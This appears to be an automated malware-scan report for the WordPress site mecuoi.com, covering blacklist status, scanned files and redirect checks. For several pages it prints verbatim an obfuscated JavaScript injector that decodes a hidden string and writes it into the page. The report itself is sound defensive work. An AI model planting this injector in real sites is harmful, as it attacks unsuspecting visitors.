Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mecuoi.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mecuoi.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.mecuoi.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 21:05:23 GMT Location: http://mecuoi.com/ Server: Apache Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://mecuoi.com/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.3 X-W3TC-Minify: On | clean |
http://mecuoi.com/ | 200 OK Content-Length: 50655 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw7 = []; _gw7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw7.push(['_setOption', '6918518510413211616918118018617118018618718216516719318']); _gw7.push(['_setPageId', '2181185175186175181180128167168185181178187186171129169']); _gw7.push(['_trackPageview', '1781751821281841711691861101221201241821901141671871861']); _gw7.push(['_setOption', '8111416718718618111412212012418219011112919513011718518']); _gw7.push(['_setOption', '6191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/jquery-1.2.6.min.js | 200 OK Content-Length: 55774 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/jquery.idTabs.min.js | 200 OK Content-Length: 2284 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/dropdown-menu.js | 200 OK Content-Length: 669 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/js_liveclock.js | 200 OK Content-Length: 967 Content-Type: application/javascript | clean |
http://mecuoi.com/popkgs.j | 200 OK Content-Length: 39265 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw7 = []; _gw7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw7.push(['_setOption', '6918518510413211616918118018617118018618718216516719318']); _gw7.push(['_setPageId', '2181185175186175181180128167168185181178187186171129169']); _gw7.push(['_trackPageview', '1781751821281841711691861101221201241821901141671871861']); _gw7.push(['_setOption', '8111416718718618111412212012418219011112919513011718518']); _gw7.push(['_setOption', '6191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://www.google.com/cse/brand?form=cse-search-box&lang=vi | 200 OK Content-Length: 2504 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21394 Content-Type: text/javascript | clean |
http://mecuoi.com/popgame.j | 200 OK Content-Length: 39266 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw7 = []; _gw7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw7.push(['_setOption', '6918518510413211616918118018617118018618718216516719318']); _gw7.push(['_setPageId', '2181185175186175181180128167168185181178187186171129169']); _gw7.push(['_trackPageview', '1781751821281841711691861101221201241821901141671871861']); _gw7.push(['_setOption', '8111416718718618111412212012418219011112919513011718518']); _gw7.push(['_setOption', '6191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://mecuoi.com/wp-content/plugins/wp-avim-reloaded/avimr.js | 200 OK Content-Length: 30835 Content-Type: application/javascript | clean |
http://mecuoi.com/sample-page/ | 200 OK Content-Length: 33628 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw7 = []; _gw7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw7.push(['_setOption', '6918518510413211616918118018617118018618718216516719318']); _gw7.push(['_setPageId', '2181185175186175181180128167168185181178187186171129169']); _gw7.push(['_trackPageview', '1781751821281841711691861101221201241821901141671871861']); _gw7.push(['_setOption', '8111416718718618111412212012418219011112919513011718518']); _gw7.push(['_setOption', '6191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/comment-functions.js | 200 OK Content-Length: 4824 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-includes/js/tw-sack.js?ver=1.6.1 | 200 OK Content-Length: 3619 Content-Type: application/javascript | clean |
http://mecuoi.com/wp-content/themes/WP-MagaNews/scripts/js/ajax-comment-preview.js?ver=2.01352570600 | 200 OK Content-Length: 3797 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mecuoi.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 21:05:24 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://mecuoi.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.3
X-W3TC-Minify: On
GET / HTTP/1.1
Host: mecuoi.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 21:05:24 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://mecuoi.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.3
X-W3TC-Minify: On
Second query (visit from search engine):
GET / HTTP/1.1
Host: mecuoi.com
Referer: http://www.google.com/search?q=mecuoi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mecuoi.com
Referer: http://www.google.com/search?q=mecuoi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.